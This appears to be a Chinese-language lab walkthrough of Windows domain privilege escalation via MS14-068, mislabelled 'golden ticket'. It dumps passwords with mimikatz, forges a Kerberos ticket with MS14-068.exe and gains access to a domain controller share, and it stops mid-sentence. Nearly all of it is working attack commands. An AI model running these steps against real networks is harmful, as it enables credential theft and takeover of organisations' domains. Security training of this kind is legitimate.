金票据
- 伪造凭据,提升域内普通用户权限
以admin用户登入任意一台域内主机
收集域信息
命令有:net config workstation,可以看到域名为:cyberpeace。
nltest /dsgetdc:域名,可以看到域控主机名为:scene。
以admin权限运行mimikztz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt
找到域内一个用户和对应密码
使用该域用户登入域内
执行:dir \scene.cyberpeace.com\c$,尝试列出域控目录,提醒权限不够
尝试利用MS14-068来将用户的权限提升到域管权限
检查是否有提权漏洞,其补丁为 3011780,我们执行命令: systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在MS14-068漏洞。
MS14-068漏洞利用方法:
MS14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址
目前我们已经知道域成员devuser和其密码,域控制器地址scene.cyberpeace.com,还需要知道的是devuser的SID值。
通过Whoami /all或者whoami /user,查看devuser用户的suid:
执行命令:
C:\MS14-068>MS14-068.exe -u devuser@cyberpeace.com -p HOTdev123456 -s S-1-5-21-97341123-1865264218-933115267-1108 -d scene.cyberpeace.com
命令执行成功后会在当前目录下生成一个凭证。
再使用mimikatz清空之前缓存的凭证,导入伪造的凭证:mimikatz # kerberos::purge //清空票据mimikatz # kerberos::ptc 凭证文件地址
此刻再输入:
dir \\scene.cyberpeace.com\c$,发现访问成功,现在我们